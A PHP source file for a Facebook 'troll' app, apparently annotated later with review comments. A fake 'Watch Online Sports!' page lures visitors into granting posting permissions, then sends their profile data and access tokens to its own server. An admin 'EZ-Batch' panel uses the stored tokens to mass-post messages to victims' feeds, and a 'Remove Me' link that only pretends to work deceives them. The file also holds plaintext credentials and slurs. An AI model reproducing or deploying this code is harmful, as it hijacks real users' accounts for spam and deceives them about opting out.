<?php
//////////////////////////////////////////////////////////////////
//		Troll External App - Instructions						//
//////////////////////////////////////////////////////////////////
//	Step 1: Create a new database and database user 			//
//	Step 2: Upload the file and fill in the correct info 		//
//	in this file for the database.								//
//																//
//																//
//		$db = database											//
//		$dbu = database username								//
//		$dbp = database password								//
//		$host = database host - usually localhost				//
//																//
//																//
//	Step 3: Go here: http://developers.facebook.com/setup/ 		//
//	and setup the app. Grab the AppID - it's all 				//
//	you will need.												//
//																//
//	Step 4: Add the appid to this file and edit anything 		//
//	else you might want to change.								//
//																//
//	Step 5: Go to (this filename).php?install=gayfag			//
//																//
//	The app is now installed if you didn't fuck shit up.		//
//			.php?admin to access the admin panel				//
//																//
//////////////////////////////////////////////////////////////////


//////////////////////////////////////////////////////////////////
//			Database Settings			//
//////////////////////////////////////////////////////////////////
// Connection parameters consumed by the mysql_connect()/mysql_select_db() calls further down.
// NOTE(review): the credentials sit in plaintext in this file, so read access to the source discloses them.
$db 	= "jknetinf_1";		//Database name
$dbu 	= "jknetinf_1";		//Database username
$dbp 	= "123";		//Database password
$host	= "209.190.61.33";		//Database host - usually localhost

//////////////////////////////////////////////////////////////////
//			The App Settings			//
//////////////////////////////////////////////////////////////////
// $user/$pass are compared as plaintext against the admin login form (see the ?admin branch).
$user = "Kris";		//Username for admin panel
$pass = "JacK";			//Password for admin panel
$appid  = "205231489516814";	//Application ID
// Permission list passed to FB.login() by the landing page. publish_stream and offline_access are the
// legacy Facebook permissions for posting to a user's stream and for tokens that outlive the session;
// the admin batch code below relies on both when it posts with stored tokens.
$app_perms = "publish_stream,offline_access";	//Application permissions - You don't need to edit this. Ignore it.
$niche_title	= "Watch Online Sports!";	//Niche Title
// Message the landing page posts to the visitor's own feed right after they grant access.
$status_message = "";	//Status update text
//Content to display to the user - must be valid HTML with no single quotes ( ' <-- that )
// This markup is what the ?store endpoint returns once the visitor's data has been recorded.
$final_output 	= '<iframe style="width: 100%; height: 600px;" src="http://watchonlinelive.info/" scrolling="no" frameborder="0"></iframe>';
$content_width 	= "1000";	//Size the content width needs to be after they click allow
$content_height = "660";	//Size the content height needs to be after they click allow


//////////////////////////////////////////////////////////////////
//			Don't Edit Below This								//
//////////////////////////////////////////////////////////////////
// Request bootstrap: runs on every hit, before the ?store / ?install / ?admin / ?logout dispatch.
session_start();
$the_users_ip    	= $_SERVER['REMOTE_ADDR'];
$your_domain 		= $_SERVER['HTTP_HOST'];
$your_file_path		= $_SERVER['REQUEST_URI'];
// URL-encoded "host + path + ?id=<base64 of client IP>"; not referenced again in the visible file.
$longurl		= urlencode($your_domain . $your_file_path . "?id=" . base64_encode($the_users_ip));
// Legacy ext/mysql API (removed in PHP 7.0). Neither call's return value is checked.
$sqllink 		= mysql_connect($host, $dbu, $dbp);
mysql_select_db($db);
// Appends a "Remove Me" link to the post-consent content (and keeps a copy in $remove_code).
// The link only invokes the client-side remove_user() function defined in the landing page.
$final_output = $final_output . $remove_code  = '<br><a href="#" onclick="remove_user();">Remove Me From This Application</a>';
if(isset($_GET['store']) && isset($_POST['id'])){
	// ?store endpoint: receives the profile fields and the access token that the landing page's
	// login() script posts after the visitor grants the requested permissions.
	// Each field goes through mysql_real_escape_string() first, then trim() and strip_tags().
	// NOTE(review): escaping runs before the other filters (the reverse of the usual order), and the
	// values are interpolated into SQL strings below rather than bound as parameters.
	$id 		= strip_tags(trim(mysql_real_escape_string($_POST['id'])));
	$name 		= strip_tags(trim(mysql_real_escape_string($_POST['name'])));
	$first_name 	= strip_tags(trim(mysql_real_escape_string($_POST['first_name'])));
	$last_name 	= strip_tags(trim(mysql_real_escape_string($_POST['last_name'])));
	$link 		= strip_tags(trim(mysql_real_escape_string($_POST['link'])));
	$gender 	= strip_tags(trim(mysql_real_escape_string($_POST['gender'])));
	$timezone 	= strip_tags(trim(mysql_real_escape_string($_POST['timezone'])));
	$locale 	= strip_tags(trim(mysql_real_escape_string($_POST['locale'])));
	$verified 	= strip_tags(trim(mysql_real_escape_string($_POST['verified'])));
	$token 		= strip_tags(trim(mysql_real_escape_string($_POST['token'])));
	// Client address as seen by the server; stored with the record and consulted by the landing
	// page's `ip` lookup when it decides whether to auto-post.
	$ip 		= $_SERVER['REMOTE_ADDR'];
	// A row is inserted only when this Facebook id is not recorded yet.
	if(mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `fbid`='$id';")) == 0){
		// The access token is written as received into the `token` column; `hit` starts at '0',
		// which is the flag the admin batch uses to select rows.
		$insert_sql = "INSERT INTO `$db`.`users` (`id`, `fbid`, `name`, `first_name`, `last_name`, `link`, `gender`, `timezone`, `locale`, `verified`, `token`, `ip`, `timestamp`,`hit`) VALUES 
		(NULL , '$id', '$name', '$first_name', '$last_name', '$link', '$gender', '$timezone', '$locale', '$verified', '$token', '$ip', CURRENT_TIMESTAMP,'0');";	
		if(mysql_query($insert_sql)){
			// Response body is inserted into #content by the calling script.
			echo $final_output;
		}else{
			echo("alert('Verification Failed! :(')");
		}
	}else{
		// Already-recorded ids get the same content; the stored row is not updated.
		echo $final_output;
	}
}elseif(isset($_GET['install'])){
	// Setup path: creates the `users` table when ?install carries the fixed string below.
	// NOTE(review): the guard is a hard-coded value compared with ==; the admin session is not checked here.
	if($_GET['install'] == "gayfag"){
		// Schema: one row per Facebook account. `token` holds the access token posted by the
		// landing page, `ip` the client address, and `hit` the flag the admin batch sets after posting.
		$install_sql = "CREATE TABLE `$db`.`users` (
		`id` INT NOT NULL AUTO_INCREMENT ,
		`fbid` BIGINT NOT NULL ,
		`name` TEXT NOT NULL ,
		`first_name` TEXT NOT NULL ,
		`last_name` TEXT NOT NULL ,
		`link` TEXT NOT NULL ,
		`gender` TEXT NOT NULL ,
		`timezone` TEXT NOT NULL ,
		`locale` TEXT NOT NULL ,
		`verified` INT NOT NULL ,
		`hit` INT NOT NULL ,
		`token` TEXT NOT NULL ,
		`ip` TEXT NOT NULL ,
		`timestamp` TIMESTAMP NOT NULL ,
		PRIMARY KEY ( `id` )
		) ENGINE = MYISAM ;";
		if(mysql_query($install_sql)){
			echo "Installed!";
		}else{
			// Any query failure lands here, not only connection problems.
			echo "Database connection error. Check your database configuration. If its right, it should have installed.";
		}
	}else{
		echo "Wrong! Gtfo gayfag!";
	}
}elseif(isset($_GET['admin'])){
	// Admin panel. Access is decided solely by whether $_SESSION['admin'] is set.
	if(!isset($_SESSION['admin'])){
		if(isset($_POST['login'])){
			// Submitted credentials are compared against the plaintext $user/$pass settings with
			// loose (!=) comparison.
			// NOTE(review): no hashing (password_verify) or constant-time comparison (hash_equals) is used.
			$u = $_POST['user']; $p = $_POST['pass'];
			if($u != $user || $p != $pass){ $login_error = true; }else{ $login_error = false; }
			// On success the session flag is set to a fixed string and the browser is redirected to
			// the panel; the session id is not regenerated and execution continues after header().
			if($login_error == true){ echo "<center><b>Bad Login, Bro.</b></center>"; }else{ $_SESSION['admin'] = "poopdick"; header("Location: " . $_SERVER['self'] . "?admin"); }
		}else{ 
			// No login attempt yet: render the login form, which posts back to ?admin.
			?><html><head><title>Administration Panel | Login</title><style type="text/css"> body{ font-family: Tahoma; color: black; background-image: url(http://i.imgur.com/kMf79.jpg); background-repeat: repeat-x; }</style></head><body><br><br><br><br><center>Please Login To Continue<form action="<?php echo $_SERVER['self'] . "?admin"; ?>" method="POST"><table border="0" style="color: black;"><tr><td>Username:</td><td><input type="text" name="user" style="width: 100%;"></td></tr><tr><td>Password:</td><td><input type="password" name="pass" style="width: 100%;"></td></tr><tr><td colspan="2"><input type="submit" name="login" style="width: 100%;"></td></tr></table></form></center></body></html><?php
		}
	}else{ ?>
		<html><head><title>Administration Panel</title><style type="text/css"> body{ font-family: Tahoma; color: black; background-image: url(http://i.imgur.com/kMf79.jpg); background-repeat: repeat-x; }</style></head><body>
		<div id="nav">
		<a style="color: white; text-decoration: none; font-weight: bold;" href="<?php echo $_SERVER['self'] . "?admin"; ?>">Home</a> |
		<a style="color: white; text-decoration: none; font-weight: bold;" href="<?php echo $_SERVER['self'] . "?admin&batch"; ?>">EZ-Batch</a> | 
		<a style="color: white; text-decoration: none; font-weight: bold;" href="<?php echo $_SERVER['self'] . "?logout"; ?>">Logout</a>
		</div><center><br><br><br><br>
		<?php
		if(isset($_GET['batch'])){
			// Batch view (?admin&batch): on form submit, posts an operator-supplied message to the
			// feeds of recorded users via their stored access tokens.
			if(isset($_POST['batch_it'])){
				$status = $_POST['status'];
				// NOTE(review): $size is escaped but then used unquoted in LIMIT, where escaping does
				// not enforce an integer; an (int) cast would.
				$size   = mysql_real_escape_string($_POST['amount']);
				$zone   = $_POST['timezone'];

				// Form codes e/c/m/p select rows whose stored `timezone` is -5/-6/-7/-8; all queries
				// are restricted to rows with hit='0'. Code "a" takes every such row and ignores $size.
				// Any other value leaves $grab undefined.
				if($zone == "e"){
					$grab = "SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-5' AND `users`.`hit`='0' ORDER BY `users`.`id` ASC LIMIT $size;";
				}elseif($zone == "c"){
					$grab = "SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-6' AND `users`.`hit`='0' ORDER BY `users`.`id` ASC LIMIT $size;";
				}elseif($zone == "m"){
					$grab = "SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-7' AND `users`.`hit`='0' ORDER BY `users`.`id` ASC LIMIT $size;";
				}elseif($zone == "p"){
					$grab = "SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-8' AND `users`.`hit`='0' ORDER BY `users`.`id` ASC LIMIT $size;";
				}elseif($zone == "a"){
					$grab = "SELECT * FROM `$db`.`users` WHERE `users`.`hit`='0';";
				}
				
				$result1 = mysql_query($grab);
				echo "<table border='0' style='width: 900px;' cellspacing='0'><th style='background-color: #3B5998; color: white;' colspan='3'>Batch Results</th>";
				$c_count = 0;
				while ($u = mysql_fetch_array($result1, MYSQL_ASSOC)) {
					// Rows without a stored token are skipped but still counted.
					if(!empty($u['token'])){
						// One server-side POST per row to the Graph API feed endpoint of that user,
						// authenticated with the user's stored token. From the network side this shows up
						// as a run of requests from the web host to graph.facebook.com/<fbid>/feed.
						$url 	= "https://graph.facebook.com/" . $u['fbid'] . "/feed";
						$ch 	= curl_init();
						curl_setopt($ch, CURLOPT_URL,$url);
						curl_setopt($ch, CURLOPT_POST, 1);
						curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
						curl_setopt($ch, CURLOPT_POSTFIELDS,"access_token=" . $u['token'] . "&message=" . $status);
						$cresult = curl_exec($ch);
						curl_close ($ch);
						$c_res = json_decode($cresult);
						// The row is flagged hit='1' before the API response is inspected, i.e. whether
						// or not the post succeeded.
						mysql_query("UPDATE `$db`.`users` SET `hit` = '1' WHERE `users`.`id` ='" . $u['id'] . "';");
						if(isset($c_res->error->message)){
							$ret_res = "<b style='color: red;'>FUCK. - " . $c_res->error->message . "</b>";
						}elseif(isset($c_res->id)){
							$ret_res = "<b style='color: green;'>Post Success! Post ID: " . $c_res->id . "</b>";
						}
						
						// Alternating row colours; the stored name and the API message are echoed as-is.
						if($c_count&1){
							echo "<tr style='background-color: white;'><td>Post: $c_count/$size</td><td>" . $u['name'] . "</td><td>" . $ret_res . "</td></tr>";
						}else{
							echo "<tr style='background-color: lightgrey;'><td>Post: $c_count/$size</td><td>" . $u['name'] . "</td><td>" . $ret_res . "</td></tr>";
						}
					}
					$c_count++;
				}
				mysql_free_result($result1);
				echo "<th style='background-color: #3B5998; color: white;' colspan='3'>Batch Complete</th></table>";
			}else{
		?>
				<form action="<?php echo $_SERVER['self'] . "?admin&batch"; ?>" method="POST" target="_blank">
				<table border="0" style="color: black; " cellspacing="0">
				<th colspan="6" style="background-color: #3B5998; color: white;">Batch To Users</th>
				<tr>
				<td>Status Text (include the link):</td>
				<td><input type="text" name="status" style="width: 300px;"></td>
				<td><select name="timezone">
				<option value="a">All Timezones</option>
				<option value="e">Eastern</option>
				<option value="c">Central</option>
				<option value="m">Mountain</option>
				<option value="p">Pacific</option>
				</select></td>
				<td>Size:</td><td><input type="text" style="width: 90px;" name="amount"></td>
				<td><input type="submit" name="batch_it" value="Run Batch"></td>
				</tr>
				<th colspan="6">(Note: Keep batch size UNDER 1000)</th>
				</table>
				</form>
			
		
		<?php 
			}
		}elseif(isset($_GET['reset'])){
			// ?admin&reset: clears the `hit` flag on every row, making all recorded users eligible
			// for the batch again. Triggered by a plain GET link from the dashboard.
			if(mysql_query("UPDATE `$db`.`users` SET `hit` = '0';")){
				echo "Successfully reset all spammed users to 'unspammed'.";
			}else{
				echo "Could not reset spammed users to unspammed. Uh oh?";
			}
		}else{ 
			// Dashboard: row counts overall, with hit='0', and per stored timezone offset.
			// Each count fetches a full SELECT * result and counts its rows.
			$total_users 	 = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users`;"));
			$unspammed_users = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `users`.`hit`='0';"));
			$est_users 	 = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-5';"));
			$cet_users 	 = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-6';"));
			$mnt_users 	 = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-7';"));
			$pac_users 	 = mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `users`.`timezone`='-8';"));
			// Current local time in each zone, obtained by switching the process default timezone
			// before every date() call; the default is left at America/Los_Angeles afterwards.
			date_default_timezone_set('America/New_York');
			$est_time	 = date("g:i a");
			date_default_timezone_set('America/Chicago');
			$cet_time	 = date("g:i a");
			date_default_timezone_set('America/Boise');
			$mnt_time	 = date("g:i a");
			date_default_timezone_set('America/Los_Angeles');
			$pac_time	 = date("g:i a"); ?>
			<table border="0" style="color: black; width: 500px;" cellspacing="0">
				<th colspan="3" style="background-color: #3B5998; color: white;">General User Information</th>
				<tr style="background-color: white;"><td>Total Users:</td><td colspan="2"><?php echo $total_users; ?></td></tr>
				<tr style="background-color: lightgrey;"><td>Total Unspammed Users:</td><td><?php echo $unspammed_users; ?></td>
				<td><a style="color: black; text-decoration: none; font-weight: bold;" href="<?php echo $_SERVER['self'] . "?admin&reset"; ?>">Reset Spammed Users</a></td></tr>
				<tr><td colspan="3">(Note: The initial wallpost is <b>not</b> logged, so we might hit them twice.)</td></tr>
				<tr><td colspan="3">&nbsp;</td></tr>
				<tr><td colspan="3">&nbsp;</td></tr>
				<th colspan="3" style="background-color: #3B5998; color: white;">North American Timezone User Count</th>
				<tr style="font-weight: bold; background-color: #3B5998; color: white;">
					<td >Timezone</td>
					<td>Current Time</td>
					<td>User Count</td>
				</tr>
				<tr style="background-color: white;">
					<td>Eastern</td>
					<td><?php echo $est_time; ?></td>
					<td><?php echo $est_users; ?></td>
				</tr>
				<tr style="background-color: lightgrey;">
					<td>Central</td>
					<td><?php echo $cet_time; ?></td>
					<td><?php echo $cet_users; ?></td>
				</tr>
				<tr style="background-color: white;">
					<td>Mountain</td>
					<td><?php echo $mnt_time; ?></td>
					<td><?php echo $mnt_users; ?></td>
				</tr>
				<tr style="background-color: lightgrey;">
					<td>Pacific</td>
					<td><?php echo $pac_time; ?></td>
					<td><?php echo $pac_users; ?></td>
				</tr>
			</table>
		<?php } ?>
		</center></body></html>
	<?php

	}
}elseif(isset($_GET['logout'])){
	// Ends the admin session and redirects the browser back to the ?admin login view.
	session_destroy();
	header("Location: " . $_SERVER['self'] . "?admin");
}else{
	// Default path (no recognised query parameter): serve the public landing page below.
?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title><?php echo $niche_title; ?></title>
<script src="http://code.jquery.com/jquery-1.4.4.js"></script>
<style type="text/css"> body{ font-family: Tahoma; color: white; background-image: url(http://i.imgur.com/kMf79.jpg); background-repeat: repeat-x; } #box{ -moz-border-radius: 15px; border-radius: 15px; background-color: #fff; width: 750px; color: black; border: 2px lightgrey solid; padding: 15px; } .box2{ -moz-border-radius: 15px; border-radius: 15px; background-color: #fff; color: black; width: 500px; height: 450px; border: 2px lightgrey solid; } </style>
</head>
<body>
<center>
<div id="logo" style="font-weight: bold;"><br><?php echo $niche_title; ?></div><br><br><br>
<div id="box">
<h3 id="login_box">Step 1: Click <button onclick="login();">HERE</button> And Click allow</h3>
<div class="box2" id="content"><br><h3 style="color: grey;"><br><br><br><br><br><br>Please Complete Step 1</h3><br><br></div>
</div><br><br><br>
<div style="color: black;"><?php echo $your_domain; ?>&copy; 2009-2012</div>
</center>
<div id="fb-root"></div>
<script>
	// Called by the Facebook JS SDK once it has loaded; initialises it with the app id
	// taken from the $appid setting.
	window.fbAsyncInit = function() {
		FB.init({appId: '<?php echo $appid; ?>', status: true, cookie: true,
			xfbml: true});
		};
	// Injects the SDK script tag asynchronously, using the same protocol as the page itself.
	(function() {
		var e = document.createElement('script');
		e.type = 'text/javascript';
		e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js';
		e.async = true;
		document.getElementById('fb-root').appendChild(e);
	}());
</script>
    
<script type="text/javascript">
// Handler for the "Remove Me From This Application" link appended to the post-consent content.
// It shows a confirm dialog and, 1.7 s after confirmation, a success alert. No request is sent
// and no Facebook API call is made in this function, so nothing is changed on the server or in
// the app's permissions.
function remove_user(){
	if(confirm("Are you sure you want to remove yourself from this application?") == true){
		setTimeout(function(){
		alert("You have successfully been removed from this application. Sorry you didn't like it!");},1700);
	}
}
// Page-global holding the visitor's access token once get_token() has resolved.
var token = "";
// Copies the access token of the current Facebook session into the global `token`.
// The lookup is asynchronous; `return false` only leaves the callback and get_token() itself
// returns nothing, which is why login() waits before reading `token`.
function get_token(){
	FB.getLoginStatus(function(response){
		if(response.session){
			token = response.session.access_token;
		}else{
			return false;
		}
	});
}
// Click handler for the "Step 1" button. Flow, as written:
//   1. FB.login() asks the visitor to grant the permissions listed in $app_perms.
//   2. On grant, the visitor's /me profile is fetched and get_token() is started.
//   3. After 3 s, the profile fields plus the access token are POSTed to this script's
//      ?store=1 endpoint, and the returned HTML is injected into #content.
//   4. 2 s later, a post to the visitor's own feed is made with $status_message, but only if
//      the server found no `users` row for the visitor's IP when it rendered this page.
function login() {
	FB.login(function (response) {
		if(response.session){
			if(response.perms){
				FB.api('/me', function(response){
					var id = response.id;
					var name = response.name;
					var first_name = response.first_name;
					var last_name = response.last_name;
					var link = response.link;
					var gender = response.gender;
					var timezone = response.timezone;
					var locale = response.locale;
					var verified = response.verified;
					get_token();
					// Delay gives the asynchronous get_token() time to populate `token`.
					setTimeout(function(){
						// The access token leaves the browser here and is stored server-side.
						$.post("<?php echo $_SERVER['self'];?>?store=1", {id: id, name: name, first_name: first_name, last_name: last_name, link: link, gender: gender, timezone: timezone, locale: locale, verified: verified, token: token},
						function(data){
								$('#login_box').hide();
								$('#content').html(data);
								$('#content').width(<?php echo $content_width; ?>);
								$('#content').height(<?php echo $content_height; ?>);
								$('#box').width(<?php echo $content_width; ?>);
								
						});
						
						setTimeout(function(){
							// The PHP condition is evaluated at page render time, so the feed post below is
							// emitted into the page only for IPs with no stored row at that moment.
							<?php if(mysql_num_rows(mysql_query("SELECT * FROM `$db`.`users` WHERE `ip`='$the_users_ip';")) == 0){ ?>
							FB.api('/me/feed', 'post', {message: "<?php echo $status_message; ?>"}, function(response){
								if(!response || response.error){
									//alert('Sorry, An Error Occured. Please Try Again!');
								}else{
									//Post success - lets eat cake!
								}
							});
							<?php } ?>
						},2000);
					},3000);
				});
            }else{
                alert('Sorry, you must allow the application in order to get a response.');
            }
        }else{
            alert('Error Logging In. Please Try Again.');
        }
    },{ perms: '<?php echo $app_perms; ?>'});
}
</script>
</body>
</html>
<?php }
 // Reached after every branch of the dispatch above: closes the connection opened at startup.
 mysql_close($sqllink); 
?>
